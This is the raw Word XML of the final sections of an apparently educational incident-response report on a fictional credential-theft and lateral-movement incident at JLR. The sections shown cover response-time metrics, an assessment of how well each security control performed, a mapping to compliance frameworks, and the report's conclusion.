            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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991B1B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MISS — (review in PIR)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Time to Analyst Response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&lt; 5 min from P1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2 min 15 sec</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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2D6A4F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MET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Time to Short-Term Containment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&lt; 30 min from detection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17 min (02:41 → 02:58)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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2D6A4F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MET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Service Account Disable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&lt; 5 min (automated)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2 sec (Sentinel playbook)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2D6A4F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MET (automated)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Time to OT Confirmation (no breach)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&lt; 20 min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12 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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2D6A4F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MET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Time to Full Containment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&lt; 6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4h 17m</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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2D6A4F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MET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NIS2 Notification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&lt; 24 hours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16h 19m</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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2D6A4F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MET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System Recovery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&lt; 24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4h 58m</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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2D6A4F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MET</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">7.2 Controls Effectiveness Assessment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60"/>
        <w:gridCol w:w="3000"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="256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Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Finding / Action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NGFW — OT Boundary Rule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2D6A4F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">EFFECTIVE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Blocked all 3 OT probe packets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OT systems confirmed unaffected — rule performed as designed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Sentinel Correlation Rules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2D6A4F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">EFFECTIVE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7 alerts, P1 in 38 min from first IOC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TTD target missed; CORR tuning review scheduled for Q2 2026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CrowdStrike Falcon EDR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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92400E"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">PARTIAL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Detected LSASS; did NOT prevent it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Alert-only on VLAN 20 allowed credential dump — moved to prevention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Darktrace NDR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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2D6A4F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">EFFECTIVE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Detected C2 in &lt;1 min of first beacon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Antigena block auto-engaged after 12 beacons — performed well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Sentinel SOAR Playbook</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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2D6A4F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">EFFECTIVE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SVC account disabled in 2 seconds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Automated response reduced attacker window significantly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Claroty OT Monitoring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2D6A4F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">EFFECTIVE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Confirmed no S7 comm; alert to SOC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Alert surfaced in time for OT team to verify within 12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Sysmon Logging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90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2D6A4F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">EFFECTIVE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Full process tree captured in logs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Event IDs 1, 10, 3 provided definitive forensic reconstruction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Employee Phishing Training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991B1B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">INEFFECTIVE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User opened phishing PDF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Mandatory refresher training issued; simulated campaign planned</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A3A2A" w:sz="10" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A2A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">8. Compliance and Framework Alignment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The incident response process for INC-JLR-2026-0312 was executed in alignment with the following frameworks and regulatory obligations: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Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Requirement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="240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JLR Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2360"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:left w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:right w:val="single" w:color="1A3A2A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A3A2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="130"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="130"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Evidence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NIST SP 800-61r2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4-phase IR lifecycle: Prep, Detect/Analyze, Contain/Eradicate/Recover, Post-Incident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Full lifecycle executed per CIRP v3.2</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Incident log, PIR, SOC timeline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NIST SP 800-61r2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Document all IOCs and evidence chain for potential legal proceedings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All logs preserved; chain of custody maintained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Forensic collection via KAPE; Sentinel log retention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ISO/IEC 27035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Detect events, report, assess, respond, learn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All 5 stages executed; PIR completed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SNW-20260318-04412 ticket history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NIS2 Directive (UK)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Report to national authority within 24 hours for significant incidents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NCSC notified at T+16h 19m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NCSC-IR-2026-0318-JLR submission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NIST SP 800-53 IR-4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Incident Handling — contain, eradicate, recover from security incidents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Containment in 4h 17m; recovery same day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Sentinel playbook logs; CrowdStrike RTR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NIST SP 800-53 SI-4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System Monitoring — continuous monitoring of IS to detect attacks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Sentinel + Darktrace + CrowdStrike + Claroty active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SIEM dashboard; monitoring architecture doc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sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ISO/IEC 27001 A.16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Information security incident management process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CIRP v3.2 executed; corrective actions documented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jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">PIR report; ISMS corrective action register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GDPR Art. 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Notify supervisory authority within 72h if personal data breached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No personal data confirmed breached — no notification required; documented no-breach determination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DLP analysis; Darktrace exfil assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A3A2A" w:sz="10" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A2A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">9. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This report has documented the end-to-end monitoring and incident response lifecycle for INC-JLR-2026-0312 — a Priority 1 credential-based lateral movement incident targeting the JLR Coventry Engineering R&amp;D and OT network environment. The incident represents a sophisticated, multi-stage attack involving spear-phishing, LSASS credential dumping, lateral movement via a compromised service account, and a deliberate probe of the OT/Manufacturing VLAN 30 boundary.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The outcome — full containment in 4 hours 17 minutes with no OT systems breached and no confirmed data exfiltration — validates the effectiveness of JLR's layered monitoring architecture. The convergence of Microsoft Sentinel's correlation rules, Darktrace's autonomous AI detection and blocking, CrowdStrike Falcon's endpoint telemetry, Palo Alto NGFW inter-VLAN enforcement, and Claroty's OT-specific monitoring provided the multi-source visibility required to reconstruct the complete attack chain and respond decisively.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Key lessons identified through post-incident review have already been actioned: CrowdStrike Falcon has been moved to full prevention mode on VLAN 20, OT boundary probe alerts now trigger automated host isolation rather than alert-only, and PDF macro execution has been blocked at the endpoint ASR layer. These improvements directly address the two root cause findings — the gap in automated prevention and the successful execution of a phishing email.</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3A2A" w:sz="1"/>
              <w:left w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:right w:val="single" w:color="1A3A2A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A3A2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">PROGRAM OUTCOME</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:left w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:right w:val="single" w:color="1A3A2A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D8F3DC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">INC-JLR-2026-0312 is fully documented with raw log evidence, SIEM dashboard screenshots, a NIST SP 800-61r2-aligned incident response process, and a controls effectiveness assessment. The JLR monitoring and incident response posture demonstrates the capability to detect, contain, and recover from a sophisticated multi-stage attack against a combined IT/OT enterprise environment.</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2A" w:sz="1"/>
              <w:left w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:right w:val="single" w:color="1A3A2A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D8F3DC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="140"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="140"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A3A2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Document Control</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="140"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Version: 1.0  |  Status: Final  |  Date: April 2026</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Author: DAE Cybersecurity Program  |  Classification: Confidential — Internal Use Only</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">This document is produced for educational and program assessment purposes within the DAE Cybersecurity &amp; Networking curriculum. The JLR scenario is used as a realistic organizational context for applied learning.</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4B5563"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">DAE Cybersecurity Program  |  April 2026</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="4B5563"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">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2A" w:sz="4" w:space="4"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:after="80"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="1A3A2A"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">TRINITY PROJECT  |  JLR — Network Security Event Monitoring &amp; Incident Response</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="4B5563"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>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sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="120" w:before="300"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="80" w:before="22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2026-04-29T17:49:48.379Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-29T17:49:48.380Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>